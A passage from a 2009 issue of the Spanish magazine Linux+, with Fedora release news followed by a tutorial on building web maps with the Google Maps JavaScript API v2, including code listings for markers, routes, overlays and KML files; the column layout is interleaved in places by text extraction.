la versión estable saldrá a la vez que la versión en
la que está basada, Jaunty Jackalope.
 Si no puedes leer el disco DVD
y no notas ningún tipo de deterioro
mecánico, por favor, pruébalo en al menos
dos unidades de disco diferentes.

4/2009

En caso de problemas, escribir a: dvd@lpmagazine.org

 novedades
Fedora sección llevada por Diego Rivero Montes linux@lpmagazine.org
¿Fedora en versión rusa?
Como se puede leer en los últimos tiempos
en los mundos de Internet, al parecer y con
muchas posibilidades de ser verosímil. Por lo
que se desprende de tal anuncio la República
Rusa está con las miras puestas en crear una
distro nacional propia y basada en GNU/
LINUX y más concretamente en la versión
11 de Fedora. Por lo que se puede apreciar
y puesto que la base del desarrollo de la
distribución rusa va a ser la Fedora 11 es
muy probable que el proyecto se encuentre
adelantado y no tardemos mucho en verla
nacer. Claro está que todo ello será con el
permiso de la burocracia rusa.
Fedora en la PS3
Aunque ya hace tiempo que salió la PS3 no
está demás recordar que el último juguetito
de Sony viene con la posibilidad de incor-
porar una versión de Fedora especialmente
desarrollada para aprovechar las posibilida-
des de la Consola. Para todos aquellos que
la quieran ver en funcionamiento, existe
un vídeo en YouTube en el que se pueden
apreciar las maravillas de la técnica.
Autoten
EasyLife es un proyecto creado en Brasil
por el embajador de Fedora, Luís Felipe
Bretas Marzagão, y tiene como misión ha-
cer más simple la instalación de utilidades
y configuraciones del sistema en Fedora,
todo esto mediante un simple clic con el
ratón y con la comodidad de un entorno
gráfico. Con una idea similar nace Autoten
pero en este caso se le añaden numerosas
funcionalidades más. Además de lo que
hace EasyLife, permite instalar todo el
conjunto de programas que Google tiene
para Linux, múltiples codecs de vídeo y
audio así como una aplicación de control
parental para Firefox, también los drivers
de Nvidia y ATI, drivers para las tarjetas
WiFi con Chips Broadcom, el software de
virtualización VirtualBox y muchas otras
aplicaciones que nos harán la vida más fácil
como se suele decir. Para poder realizar
todo ello, necesitas:
• Una conexión a internet (activa se
entiende).
• Aparecerá un icono en el escritorio
y en el Menú->Aplicaciones->Sistema
Herramientas->autoten
KDE 4.2
Cumpliendo los plazos y fechas previstos,
se anunció la salida de el nuevo escritorio
KDE 4.2. El 27 de enero como estaba pre-
visto fue puesto a disposición del público la
nueva versión de uno de los escritorios más
populares.
Con este lanzamiento KDE se ha ganado
el reconocimiento como mejor proyecto de
Software Libre del año según los lectores de
la revista Linux Format, su comunidad ha
avanzado a pasos agigantados y ahora cuenta
con mucha más estabilidad y usabilidad.
Anuncio oficial: http://www.kde.org/
announcements/4.2/
12
Cambridge
C on una semana de retraso sobre lo previsto
vio la luz la nueva versión de Fedora, Fe-
dora 10 o como se la denominado Cambridge
que, como es habitual, fue anunciada en las
listas de correo de la marca.
Como es evidente, cada nuevo lanzamien-
to viene plagado de mejoras. Entre ellas,
podemos destacar un nuevo arranque, posibi-
lidad de instalación remota virtual y así como
se ha migrado del servidor de las X de VT7
a VT1, también hace gala de una más fácil
instalación de los códecs para Gstreamer
y el nuevo entorno de escritorio LXDE.
También es de destacar entre todo lo actua-
lizado:
• Kernel 2.6.27,
• RPM 4.6,
• KDE 4.1,
• GNOME 2.24,
• Firefox 3.04,
• OpenOffice.org 3.0.
También y del mismo modo han sido puestos
a disposición del usuario los repositorios free
y nonfree del proyecto RPM Fusion para Fe-
dora 10, incluyendo aplicaciones multimedia,
codecs, drivers para el Kernel, juegos y otro
software que el proyecto Fedora no incluye.
Vista global de Fedora 10
Habitualmente la gente de Fedora nos tiene
acostumbrados a un continuo desarrollo en
el campo del software libre y de código abierto
y por supuesto en el caso de la nueva ver-
sión no iba a dejar de serlo. Vamos a dar un
ligero vistazo a los cambios que se han pro-
ducido para esta versión de Fedora que nació
en noviembre.
Entre otras muchas podemos destacar las
siguientes mejoras como las más imprortantes:
• La compartición de conexión inalámbrica
habilita la compartición de red ad hoc.
• Una mejor configuración y uso de impre-
soras a través de herramientas de adminis-
tración mejoradas.
• Se simplifica la provisión de almacena-
miento para conexiónes locales y remotas
de virtualización.
• SecTool es un sistema nuevo de auditoría
de seguridad y detección de intrusión.
• RPM 4.6 es una actualización importante
a las bibliotecas de administración de
software poderosa y flexible.
Linux+ 4/2009
Las nuevas características disponibles incluyen:
• Para lograr una mejora en el servidor de
audio y un aumento del rendimiento del
mismo hubo de ser reescrito PulseAudio,
con la intención de que usase la planifica-
ción del audio basada en temporizadores.
• El soporte para las webcam ha sido nota-
blemente mejorado.
• También se ha llevado a cabo una gran me-
jora en el soporte para controles remotos
infrarrojos en vías a hacer más fácil conec-
tarse y trabajar con muchas aplicaciones.
• Las direcciones /usr/local/sbin:/usr/
sbin:/sbin se agregaron a PATH para usu-
arios normales, para simplificar las tareas de
administración en línea de comando.
• El servicio de cuenta en línea provee a las
aplicaciones de credenciales de cuentas on-
line listadas en http://online.gnome.org o al-
macenadas en Gconf: http://www.fedora
project.org/wiki/Features/OnlineAccounts
Service.
Para todos aquellos que quieran ver más a fon-
do las características de Fedora 10, pueden
dirigirse a la siguiente dirección: http://www.
fedoraproject.org/wiki/Releases/10/FeatureList.
Fedora 11 (Leonidas) Alpha
Recientemente hemos tenido la suerte de conocer
la versión alfa de la nueva criatura de Fedora Leo-
nidas. Entre lo que se vislumbra que va a propor-
cionar este nuevo lanzamiento encontramos:
• Windows Cross Compiler (mingw32-*)
Fedora 11 Alfa proporciona una vista pre-
via de MinGW, un entorno de desarrollo
de Fedora para ejecutar en Windows sin
utilizar Windows durante el desarrollo.
• Sistema de ficheros Ext4 por defecto.
• Btrfs, sistema de ficheros experimental de nu-
eva generación y disponible en esta entrega.
• Nuevo control de sonido.
• PackageKit Firmware Support.
• GNOME 2.26.
• KDE 4.2 Release Candidate 2.
• Xfce 4.6 Braeta.
• NetBeans 6.5.
• Python 2.6.
• Git 1.6.1.1.
Todo ya en preparación y optimización para el
próximo 26 de mayo, fecha del nacimiento de
esta nueva versión de Fedora.
 gráfica y diseño web
Mapas con el API de Google Maps

Cómo crear mapas

con el API de Google Maps
e integrarlos en tu página web
Yaiza Temprado Rodríguez
La comodidad y flexibilidad de uso de los mapas de Google hacen que cada
vez más gente quiera poder integrarlos en sus páginas web, poder personalizarlos
e interactuar con ellos.

G
racias al API que Google ha puesto a dispo- literalmente por las calles de Madrid y Barcelona (aunque
linux@software.com.pl

sición de sus usuarios y la gran cantidad de previsiblemente en los próximos meses veremos aumentar el
ejemplos que pueden encontrarse en la red, ya número de ciudades disponibles).
podemos crear los mapas que mejor se ajusten Pero sin duda, lo que realmente supone una enorme dife-
a nuestras necesidades y aprovecharnos de todo el potencial rencia respecto a los callejeros tradicionales es tener a nuestro
que Google nos ofrece. A través del siguiente artículo daremos alcance todo el potencial de Google Maps para ponerlo a nu-
los primeros pasos para la construcción de mapas que cubran estro servicio y crear nuestros propios mapas, tan sencillos o com-
las necesidades de la mayoría de los lectores, aunque no hay plejos como queramos, a través de ls API pública y gratuita
que olvidar que Google Maps da mucho, mucho más de sí. de este servicio. Esto nos permite crear mapas personalizados
de todo tipo, desde mostrando la mejor ruta a nuestro negocio,
Introducción marcando los puntos de interés de nuestro pueblo o superpo-
A principios de 2005 Google lanzó el servicio de Google niendo otro mapa para mostrar cómo quedaría un lugar con una
Maps (http://maps.google.com), que consiste en una página nueva carretera. Las posibilidades son infinitas, y la flexibilidad
web en la que se nos muestra un mapa, con mayor o menor inmensa. A lo largo de este artículo daremos los primeros pasos,
detalle, de cualquier parte del mundo. Pero los mapas de Go- explicaremos los principios básicos necesarios para crear nues-
ogle son mucho más: sin duda lo que más sorprende de ellos tros propios mapas y algunas cosas interesantes que puedan ser
es el nivel de interactividad que permiten; desde moverse por de utilidad para sacar el máximo partido a este sistema.
el mapa, hacer zoom, mostrar e introducir lugares y fotos de
interés, hasta servicios más recientes, como mostrar el aspec- Lenguaje de programación
to real de las calles a través de capturas de satélites, mostrar y software recomendado
el tráfico (por ahora, sólo disponible en EEUU), o el más Para crear mapas con Google Maps el único lenguaje de pro-
reciente en España Google Street, que nos permite movernos gramación que nos va a hacer falta es Javascript. A pesar de

14 Linux+ 4/2009

que en la página de Google Maps nos advierten
de que es importante tener un conocimiento
elevado de este lenguaje, la realidad es que hay
tantos ejemplos disponibles en la red que unos
pocos cambios normalmente serán suficientes
para ajustarlos a nuestras necesidades. En cual-
quier caso, durante este artículo se irán dando
algunas pautas necesarias sobre este lenguaje
para aquellos lectores que hayan trabajado
menos con Javascript, de forma que puedan
comprender los ejemplos y adaptarlos a lo que
están buscando.
Dado que hablamos de Javascript como
lenguaje básico, el sistema operativo sobre el
que vayan a correr los mapas será indiferente. Sí
que es altamente recomendable utilizar para eje-
cutar y depurar el código el navegador Firefox,
ya que éste trae, en el menú Herramientas, una
Consola de Errores donde podremos ir viendo
los errores que cometamos con el Javascript.
Además, si se desea depurar el código con un
método más sofisticado, existe la posibilidad de
instalar el plugin para Firefox Venkman (http://
www.mozilla.org/projects/venkman/), que nos
ofrece un debugger completo para ir depurando
paso a paso nuestro código Javascript.
Respecto al editor de código, definitivamen-
te no existe el editor perfecto. Sin embargo, una
posibilidad es instalar el plugin para Firefox Ex-
tension Developer (https://addons.mozilla.org/
es-ES/firefox/addon/7434), que nos permite
editar nuestro código Javascript o el de cualquier
página web que visitemos, guardar los ficheros
modificados, etc.
Si nuestra intención es realizar mapas más
complejos, por ejemplo en los que las coorde-
nadas se lean de una base de datos o que man-
den información a un servidor, será necesario
mezclar el código Javascript en páginas con
un lenguaje de servidor, como puede ser PHP
o JSP. Dado que su uso ya es para casos más
específicos y complejos, en este artículos crea-
remos mapas que puedan gestionarse comple-
tamente a través de código Javascript, dejando
fuera esa posibilidad.
Cómo crear un mapa básico
Antes de empezar a jugar con el código Javas-
cript, necesitamos conseguir una clave de acceso
al API de Google. Esta clave es gratuita y muy
fácil de conseguir, pero es un paso imprescin-
dible para tener acceso a las funciones del API.
Para ello es necesario contar con una cuenta de
correo de Google e introducir la URL de nues-
tro sitio web en la siguiente dirección: http://
code.google.com/intl/es/apis/maps/signup.html
Es importante leer con cuidado las con-
diciones de uso que se especifican, ya que
a pesar de que la API sea gratuita, tiene una
gráfica y diseño web
Mapas con el API de Google Maps
serie de restricciones, como mantener visibles Para crear nuestro primer mapa, creamos
los logotipos atributivos (no podemos tapar la un documento .html con la estructura básica de
imagen de Google en el mapa con otra imagen, una página web (head, body...) y copiamos den-
por ejemplo) o el número máximo de geolo- tro, por un lado el enlace a la clave que nos ha
calizaciones diarias al día (esto es, convertir dado Google (no olvides sustituir el valor que
direcciones postales en coordenadas, lo cual sigue al parámetro key por tu propia clave):
está limitado a 15.000 diarias). En general,
las condiciones son bastante buenas y serán <script src="http://maps.google.com/
más que suficientes para cualquier sitio que maps?
estemos construyendo. No obstante, merece la file=api&amp;v=2&amp;key=MICLAVE&hl=es"
pena echarles un vistazo. Una vez completado type="text/javascript">
el formulario, obtendremos nuestra clave: una </script>
larga ristra de números y letras. Es importante
no perderla, ya que tendremos que meterla en Y por otro lado el código de nuestro primer
todos los mapas que construyamos. mapa propiamente dicho (Listado 1).
Listado 1. El código de nuestro primer mapa
<script type="text/javascript">
//<![CDATA[
// Comprobamos que el navegador es compatible
if (GBrowserIsCompatible()) {
// Creamos la variable “mapa” y asignamos los controles básicos var
map = new GMap2(document.getElementById("map"));
map.addControl(new GlargeMapControl());
map.addControl(new GmapTypeControl());
// Centramos el mapa y establecemos el nivel de zoom inicial.
map.setCenter(new GlatLng(40.41, -3.70),6);
}
// Si no lo es, mostramos un aviso
else {
alert("Este navegador no es compatible con Google Maps");
}
//]]>
</script>
Listado 2. Creando marcadores
var point = new GLatLng(40.43,-4.78);
var marker = crearMarcador(point,'Informacion sobre este punto')
map.addOverlay(marker);
function crearMarcador(point,html) {
var marker = new GMarker(point);
GEvent.addListener(marker, "click", function() {
marker.openInfoWindowHtml(html);
});
return marker;
}
Listado 3. Definiendo un fichero XML
<markers>
<marker lat="40.65" lng="-3.71" html="Info marcador 1" label="M1" />
<marker lat="42.17" lng="-4.21" html="Info marcador 2" label="M2" />
<marker lat="43.89" lng="-1.29" html="Info marcador 3" label="M3" />
</markers>
www.lpmagazine.org 15
 gráfica y diseño web
Mapas con el API de Google Maps
Figura 1. Primer mapa en la vista híbrida
Figura 2. Mapa con marcadores personalizados
Al abrir el documento con un navegador,
veremos que con este código hemos creado un
mapa completo, centrado en el punto que noso-
tros queramos (tal y como se especifica en los
comentarios del código), con el nivel de zoom
que hayamos decidido y la escala en la parte
izquierda con la que el usuario puede controlar
el nivel de zoom. El mapa ya es plenamente
funcional, y podemos moverlo y cambiarlo de
tamaño exactamente igual que los mapas que
aparecen en Google Maps, además de mostrar
las tres vistas que ofrece:
• La normal con los nombre de las calles,
• La de satélite con el aspecto real de las
calles vistas desde arriba,
• Una versión mixta entre ambas.
Entre estas tres vistas podemos cambiar con
unos botones que se han creado en la parte su-
perior del mapa. Sin embargo, aún hay muchas
cosas que podemos añadir...
Cómo crear marcadores
Los marcadores son esos iconos en forma de
gota invertida que señalan una posición. Esta
posición puede estar marcada, o bien por un
texto (por ejemplo, Callao, 12, Madrid)
o por unas coordenadas (por ejemplo, lati-
tud=41.32, longitud=-3.71). Vamos prime- Figura 3. Cálculo de una ruta monstrando las indicaciones para llegar de un punto a otro
16
dicho a través de la función crearMarcador
(a continuación), el cual recibe dos parámetros:
el punto que queremos pintar y lo que queremos
que se muestre en el globo que aparece cuando
se pincha sobre el marcador. Esta información
es código html puro y duro, con lo que podre-
mos introducir en él cualquier elemento de html
como una imagen, una tabla, etc. El último paso
es añadir el marcador al mapa mediante la fun-
ción addOverlay, que añade elementos o capas
sobre el mapa básico (en este caso, el marca-
dor). Será esta función la que usaremos para
añadir otros elementos al mapa, como rutas,
imágenes superpuestas, etc (Listado 2).
Marcadores desde un fichero KML
Esta forma de definir los puntos está bien si
no tenemos demasiados. ¿Pero qué pasa si te-
nemos 50 puntos? ¿Vamos a definir cada uno
de ellos directamente dentro del código? Ob-
viamente no. Para ello, lo mejor es definir un
fichero XML con los campos necesarios para
definir cada marcador. Un ejemplo sería este
presentado en el Lisado 3.
De esta forma tenemos aislada la informa-
ción de los puntos de interés de nuestro código
fuente, quedando este último mucho más limpio
y escalable. Para leer ahora los marcadores que
hemos definido en el XML, lo único que debe-
ro a ver el caso más sencillo en el que tenemos mos hacer es lo que presenta el Listado 4.
el punto exacto dado en sus coordenadas. Para
ello, tendremos que introducir un poco más de Marcadores personalizados
código en nuestra página web. Por defecto, todos los marcadores que se crean
tienen exactamente el mismo aspecto: forma de
Marcadores básicos gota invertida, de color rojo claro y con un pun-
Por un lado, el siguiente código muestra cómo to negro en medio. Sin embargo, es muy proba-
se crea una variable point (que es la clase que ble que queramos cambiar este aspecto básico
maneja coordenadas, y el tipo de dato que va- de los iconos por imágenes que caractericen
mos a poder situar directamente en el mapa), mejor los puntos señalados. Para ello, primero
y después creamos el marcador propiamente definiremos un objeto derivado del tipo GIcon
Linux+ 4/2009
 gráfica y diseño web
Mapas con el API de Google Maps

(la imagen en sí) con las dimensiones que mejor dos parámetros: el punto y nuestro nuevo icono do, podemos obtener sus nuevas coordenadas y
se ajusten a nuestra imagen (Listado 5). (o, en lo que a nosotros nos afecta, la función actualizarlas, o bien en nuestro código, o bien
Una vez definido el nuevo tipo de icono, pasará de recibir como parámetros el punto y la en el fichero XML. Esta actualización podría
creamos las variables de ese tipo con la imagen información a mostrar, a recibir estos dos más hacerse de forma automática tirando un poco
que queremos que se muestre (tanto de base el icono personalizado) (Listado 6). más del hilo del código Javascript; pero eso
como de sombra): Por lo demás, el código permanece igual. queda fuera del propósito de este artículo, por
Sólo habrá que cambiar las llamadas a crear- lo que lo dejaremos para otra ocasión.
var miIcono = new GIcon(baseIcon, Marcador por crearMarcadorPersonalizado En cualquier caso, las funciones que de-
"imagenes/icono.png", null, que aparecen en el código anterior. bemos introducir en nuestro código para poder
"imagenes/iconoSombra.png"); arrastrar los marcadores de un punto a otro son
Marcadores Drag &Drop las que muestra el Listado 7.
Por último, definiremos una nueva función Pero los marcadores no tienen por qué permane- Como podemos ver, por un lado tenemos
para crear estos marcadores personalizados (o cer fijos en un punto. Podemos definirlos de tal que la definición del marcador ha cambiado
sobreescribiremos la que ya teníamos), cuya manera que el usuario pueda arrastrar el marca- ligeramente, ya que en esta ocasión, además de
mayor diferencia es que, a la hora de crear el dor hasta colocarlo en una nueva posición. Una crearlo dando la posición en la que debe estar,
objeto GMarker, llamamos a un constructor con vez situado en el punto que estábamos buscan- introducimos el modificador draggable, que
nos permite arrastrarlo. Ésta es la diferencia
Listado 4. Leyendo los marcadores más importante, ya que las funciones que reci-
ben los eventos de inicio y fin del arrastrado lo
var gmarkers = []; único que hacen es ocultar y mostrar la ventana
// Leemos del fichero coordenadas.xml de información respectivamente.
GDownloadUrl("coordenadas.xml", function(doc) { Para que este cambio de posición sea más
var xmlDoc = GXml.parse(doc); útil, vamos a modificar ligeramente la función
var markers = xmlDoc.documentElement.getElementsByTagName("marker"); que se invoca cuando soltamos el marcador en
for (var i = 0; i < markers.length; i++) { su nueva posición, de tal manera que la ventana
// Sacamos los campos del xml para cada marcador de información, en vez de mostrar un mensaje
var lat = parseFloat(markers[i].getAttribute("lat")); estático muestre las coordenadas del nuevo
var lng = parseFloat(markers[i].getAttribute("lng")); punto (Listado 8).
var point = new GLatLng(lat,lng);
var html = markers[i].getAttribute("html"); Creación de rutas
var label = markers[i].getAttribute("label"); La creación de rutas puede ser desde algo tan
// Creamos el marcador sencillo como unir dos puntos del mapa a través
var marker = crearMarcador(point,label,html); de una línea recta (que a priori puede no tener
// Y lo añadimos al mapa mucha utilidad) hasta la creación de rutas reales
map.addOverlay(marker); utilizando la información de Google Maps y, lo
} que es más importante en el caso de las rutas en
// Añadimos la barra lateral coche, las restricciones de las calles (dirección
document.getElementById("side_bar").innerHTML = side_bar_html; prohibida, sentido único, etc). Primero veremos
}); el caso básico de creación de líneas y luego nos
meteremos con el cálculo de rutas transitables.
Listado 5. Creando marcadores personalizados
Creación de una línea recta entre dos
var iconoNuevo = new GIcon();
o más puntos
// Las dimensiones de la imagen sombra del icono
La creación de líneas rectas entre dos o más
iconoNuevo.shadowSize=new Gsize(56,32);
puntos se llama Polyline, y su creación es muy
// Las dimensiones del icono
sencilla, ya que se basa en puntos exactamen-
iconoNuevo.iconAnchor=new Gpoint(16,32);
te iguales que los utilizados para la creación
//Las dimensiones de la ventana de información
de marcadores. Para pintar la ruta lo único
iconoNuevo.infoWindowAnchor=new Gpoint(16,0);
que necesitamos son las coordenadas de los
puntos que van a formar la ruta. Suponiendo
Listado 6. Definendo una nueva función para crear marcadores personalizados
que queremos pintar una ruta formada por tres
function crearMarcadorPersonalizado(point,html,miIcono) { puntos (aunque este número no está limitado),
var marker = new GMarker(point,icon); la función que pinta el Polyline será así como la
GEvent.addListener(marker, "click", function() { presenta el Listado 9.
marker.openInfoWindowHtml(html);
}); Creación de rutas reales para recorrer
return marker; a pie o en coche
} Pero sin duda, mucho más interesante que tra-
zar líneas rectas entre varios puntos, es obtener

www.lpmagazine.org 17
 gráfica y diseño web
Mapas con el API de Google Maps

una ruta funcional entre ellos. Y sin embargo a otro, parece tener más sentido este caso que indicaciones) y lo utilizamos como parte de la
es incluso más sencillo que en el caso anterior, no dar directamente latitudes y longitudes. No llamada al constructor de GDirections. Ésto se
aunque hay que analizar con cuidado lo que obstante, si en algún caso es necesario disponer debe a que es en este elemento de la página (tí-
significa cada línea (Listado 10). de esa opción, el API de Google Maps también picamente un DIV) donde aparecerán las indica-
Por un lado vemos que en este caso hemos la contempla. ciones a las que Google nos tiene acostumbrados,
introducido directamente direcciones postales. Por otro lado vemos que sacamos un ele- del estilo de gire a la derecha en la tercera roton-
Dado que estamos dando una ruta de un punto mento del código html (en este caso llamado da o siga recto hasta la salida 36. No obstante, si
sólo quisiéramos mostrar la ruta dibujada sobre el
Listado 7. Introduciendo las funciones para poder arrastrar los marcadores de un punto a otro mapa al estilo de un Polyline y sin las indicacio-
nes exactas, lo único que tendríamos que hacer
var punto = new GLatLng(41.4419, -4.1419); es eliminar la referencia a la caja de texto, de la
var marker = new GMarker(punto, {draggable: true}); manera presentada en el Listado 11.
GEvent.addListener(marker, "dragstart", function() { Afortunadamente, el método load() de
map.closeInfoWindow(); GDirections admite ambas posibilidades.
});
GEvent.addListener(marker, "dragend", function() { Superposición de imágenes
marker.openInfoWindowHtml("Nueva posición del marcador"); La primera posibilidad que nos viene a la cabeza
}); tras saber manejar distintos tipos de iconos, crear
Polylines de colores y demás personalizaciones
Listado 8. Modificando la función para que muestre las coordenadas del nuevo punto es poder introducir una leyenda en el mapa, de
forma que la persona que lo está viendo entienda
GEvent.addListener(marker, "dragend", function(overlay,latlng) {
qué significa cada una de las cosas que hemos
var info = "Lat.: " + latlng.lat() + "<br/>Long.: " + latlng.lng();
introducido en el mapa. También puede intere-
marker.openInfoWindowHtml(info);
sarnos superponer el logotipo de nuestra empresa
});
o producto sobre el mapa de Google, o posicio-
nar sobre una dirección dada una foto de nuestro
Listado 9. Creando una línea recta
negocio. Claramente tratamos aquí con dos tipos
function crearRuta(puntos) { de imágenes: por un lado unas que queremos que
// Con esta linea creamos el polyline y permanezcan fijas en una posición y sin sufrir
// cambiamos el color y el ancho modificaciones dependientes del zoom (como
map.addOverlay(new GPolyline(puntos,'#000000','5')); puede ser la leyenda o el logo), y otras que tienen
} que moverse con el mapa ya que están ancladas
var puntos = []; a unas coordenadas determinadas. Veamos cómo
puntos[0] = new GlatLng(40.87, -3.75); podemos definir cada una de ellas.
puntos[1] = new GlatLng(41.21, -2.97);
puntos[2] = new GlatLng(39.82, -3.94); Superposición de imágenes fijas
// Llamamos a la función para que se pinte la ruta El código se basa en cosas que ya hemos visto
crearRuta(puntos); en ejemplos anteriores. Poco a poco vamos
viendo una tónica general en la forma de los
Listado 10. Creando una ruta real constructos de Google Maps (Listado 12):

var panelIndicaciones; • Por un lado creamos la capa que vamos

var direcciones; a colocar encima del mapa e indicamos dón-
function mostrarRuta(origen, destino) { de se encuentra la imagen a superponer.
panelIndicaciones = document.getElementById("indicaciones"); • El siguiente parámetro es la posición dentro
direcciones = new GDirections(map, panelIndicaciones); de la imagen (o fuera de ella) desde la que
direcciones.load("from: “ + origen + “ to:" + destino); queremos contar para posicionar la imagen.
} Es decir, si los valores para este parámetro
mostrarRuta('Galileo, 40, Madrid', 'Barceló, 3, Madrid'); son (0, 0) estaremos diciendo que la po-
sición de la pantalla que indiquemos con
Listado 11. Eliminando la referencia a la caja de texto el siguiente parámetro es donde tiene que
estar la esquina inferior izquierda.
var direcciones; • Definimos el punto en el que queremos si-
function mostrarRuta(origen, destino) { tuar la imagen, sabiendo que esta distancia
direcciones = new GDirections(map); se cuenta desde la esquina inferior izquier-
direcciones.load("from: " + origen + " to:" + destino); da del mapa y que por defecto se mide en
} píxeles (igual que en el punto anterior).
mostrarRuta('Galileo, 40, Madrid', 'Barceló, 3, Madrid'); • Definimos las dimensiones de la imagen.
Podemos definirlas como fracciones del ma-

18 Linux+ 4/2009
 gráfica y diseño web
Mapas con el API de Google Maps

www.lpmagazine.org 19
 gráfica y diseño web
Mapas con el API de Google Maps
pa o como número de píxeles. En este caso
hemos usado la medida de fracción (esta
forma de calcular las posiciones también
puede aplicarse al resto de parámetros).
• Por último, como siempre, añadimos el ob-
jeto leyenda al mapa como una capa más.
A pesar de lo fácil que es introducir imágenes
en cualquier punto del mapa, no hay que olvi-
dar que una de las condiciones de uso de la API
gratuita de Google Maps es dejar a la vista el
logo y demás información de autoría que se
muestra por defecto. Lo contrario constituiría
una violación de la licencia, por lo que debemos
ser cuidadosos en este aspecto.
Superposición de imágenes
ancladas a unas coordenadas
Para superponer una imagen que se encuentre
posicionada de forma fija, y que además mo-
difique su tamaño de acuerdo con el nivel de
zoom que estemos usando, el código es ligera-
mente diferente (Listado 13).
De esta forma, tenemos la imagen centrada
entre dos puntos, lo que servirá como referencia
a la hora de dejar posicionada la imagen aunque
el usuario cambie de posición, y para mantener
el ratio de tamaño cuando se produce un zoom,
ya que la imagen también cambiará de tamaño
proporcionalmente para ajustarse al nuevo mapa.
El formato KML
Si alguno de los lectores ha intentado hacer algo
con Google Maps se habrá dado cuenta de que
en muchas ocasiones se menciona el formato
KML. KML está basado en XML y sirve para
mostrar datos geográficos en un navegador de
la Tierra, como Google Maps o Google Earth.
KML es un formato que inicialmente se definió
para Google Earth, por lo que la parte que apli-
ca en Google Maps es solamente un subconjun-
to de este estándar con el que podemos definir
marcadores, Polylines, rutas, estilos, etc.
A continuación (Listado 14) se muestra un
ejemplo de la estructura de un fichero KML en
el que se ha definido un estilo personalizado
para un Polyline , así como la definición del
Polyline en sí utilizando este estilo. Toda la
información de definición de aspecto gráfico
se encuentra entre etiquetas <Style></Style>,
dentro de las cuales se define otra etiqueta
indicando para qué tipo de elemento estamos
definiendo la apariencia; puede ser un icono
(<IconStyle>) o, como en este caso, un Po-
lyline (<LineStyle> para el grosor de la línea
y <PolyStyle> para el color). En la segunda
parte del fichero, donde se definen los puntos
que conforman el Polyline, es importante fi-
jarse en un par de detalles: primero, la etiqueta
20
<styleUrl>, que es la que contiene el estilo por lo que las coordenadas están formadas por
definido anteriormente que se va a aplicar (pre- 3 valores: latitud, longitud y altura.
cedido del símbolo '#'); segundo, recordar que Es muy importante saber que la estructura
ahora nos estamos moviendo en 3 dimesiones, del fichero es bastante fija, y sobre todo que
Listado 12. Superponiendo imágenes fijas
var leyenda = new GScreenOverlay('images/leyenda.jpg',
new GScreenPoint(0, 0, 'fraction', 'fraction'),
new GScreenPoint(10, 5),
new GScreenSize(0.2, 0.2, 'fraction', 'fraction'));
map.addOverlay(leyenda);
Listado 13. Superponiendo imágenes ancladas
//Definimos los puntos que representan las esquinas suroeste y noreste
var so = new GLatLng(38.67,-3.21);
var ne = new GlatLng(38.68,-3.20);
//Creamos el objeto que limitará la imagen a esos puntos
var limites = new GlatLngBounds(so, ne);
//Creamos el objeto de la imagen anclada con la imagen y los límites
var imagen = new GGroundOverlay("imagen.jpg", limites);
//La añadimos como una capa más al mapa
map.addOverlay(imagen);
Listado 14. Un ejemplo de la estructura de un fichero KML
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://earth.google.com/kml/2.2">
<Document>
<Style id="polyAzul">
<LineStyle>
<width>1.5</width>
</LineStyle>
<PolyStyle>
<color>7dff0000</color>
</PolyStyle>
</Style>
<Placemark>
<name>Edificio 41</name>
<styleUrl>#polyAzul</styleUrl>
<Polygon>
<extrude>1</extrude>
<altitudeMode>relativeToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>
-122.0858169768481,37.42231408832346,0
-122.085852582875,37.42230337469744,0
-122.0858799945639,37.42225686138789,0
-122.0858860101409,37.4222311076138,0
-122.0858069157288,37.42220250173855,0
</coordinates>
</LinearRing>
</outerBoundaryIs>
</Polygon>
</Placemark>
</Document>
</kml>
Linux+ 4/2009

Figura 4. Cálculo de una ruta anclando imágenes relevantes en los puntos de interés
distingue entre minúsculas y mayúsculas en las
etiquetas, lo que puede ser motivo de un por-
centaje muy alto de problemas con este forma-
to. En el siguiente ejemplo se ve la estructura y
los campos necesarios para describir un marca-
dor en formato KML. De nuevo se repite, igual
que en el caso anterior, la característica de que
cada marcador tiene 3 coordenadas, incluyendo
la altura (Listado 15).
Una vez que hemos definido el fichero, ten-
dremos que guardarlo con extensión .kml o .kmz,
que permitirá que tanto Google Maps como Go-
ogle Earth sean capaces de interpretarlo. Una vez
finalizado el fichero ya podemos mandarlo a Go-
ogle Maps como un parámetro más de la URL,
de esta forma: http://maps.google.com/maps?q=
http://www.ejemploscongooglemaps.com/ejemplo.
kml.
¡Ojo! Para poder pintar nuestro fichero
KML sobre Google Maps el fichero tiene que
estar disponible online. Es decir, por ejemplo la
ruta ?q=http://localhost/ejemplo1.kml no es vá-
lida. Otra cosa a tener en cuenta y que puede ha-
cer que resulte confuso el uso de KML es que,
una vez integrado un fichero .kml en un mapa,
si cambiamos el fichero el mapa permanece ca-
cheado durante un tiempo, haciendo invisibles
los cambios que hayamos realizado justo antes.
El lenguaje KML resulta bastante sencillo
de utilizar, aunque a veces su gran potencia ha-
ce que resulte complejo para aquellos que están
empezando a utilizarlo. Por ejemplo, el último
ejemplo mostrado en el que se ha definido un
punto de una forma muy sencilla, no es más
que una forma de las diversas que permite para
defininirlo. Aunque ya queda fuera de este
tutorial, su potencia permite que pudiéramos
repetir casi cada uno de los elementos que se
han ido explicando en apartados anteriores
(rutas, inserción de imágenes, marcadores
personalizados...). Para más información so-
bre la sintaxis y los distintos usos del formato
KML se puede consultar el siguiente enlace:
http://code.google.com/intl/es-ES/apis/kml/
documentation/kml_tut.html#basic_kml
Conclusiones
Como hemos podido ver, la potencia del
API de Google Maps que tenemos a nuestra
disposición nos permite hacer desde mapas
muy sencillos hasta cualquier cosa que se
nos ocurra, todo ello con el mínimo de código
y sin tenernos que complicar la vida más allá
del lenguaje Javascript. Además, la uniformi-
Listado 15. La estructura y los campos necesarios para describir un marcador en formato KML
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://earth.google.com/kml/2.2">
<Document>
<Placemark>
<name>Ejemplo de marcador</name>
<description>Esto seria un marcador</description>
<Point>
<coordinates>102.595626,14.996729</coordinates>
</Point>
</Placemark>
</Document>
</kml>
www.lpmagazine.org
gráfica y diseño web
Mapas con el API de Google Maps
Sobre la autora
Yaiza Temprado Rodríguez (ytr@moviquity.
com) es Ingeniero Superior en Informática
y actualmente realiza su doctorado en la
Universidad Carlos III de Madrid. Además
de trabajar para Telefónica I+D como ex-
perta en Data Mining, imparte clases de
Aprendizaje Automático en la Universidad
Europea de Madrid. Es además adminis-
tradora de la página www.chicaslinux.org
y su bitácora personal puede encontrarse
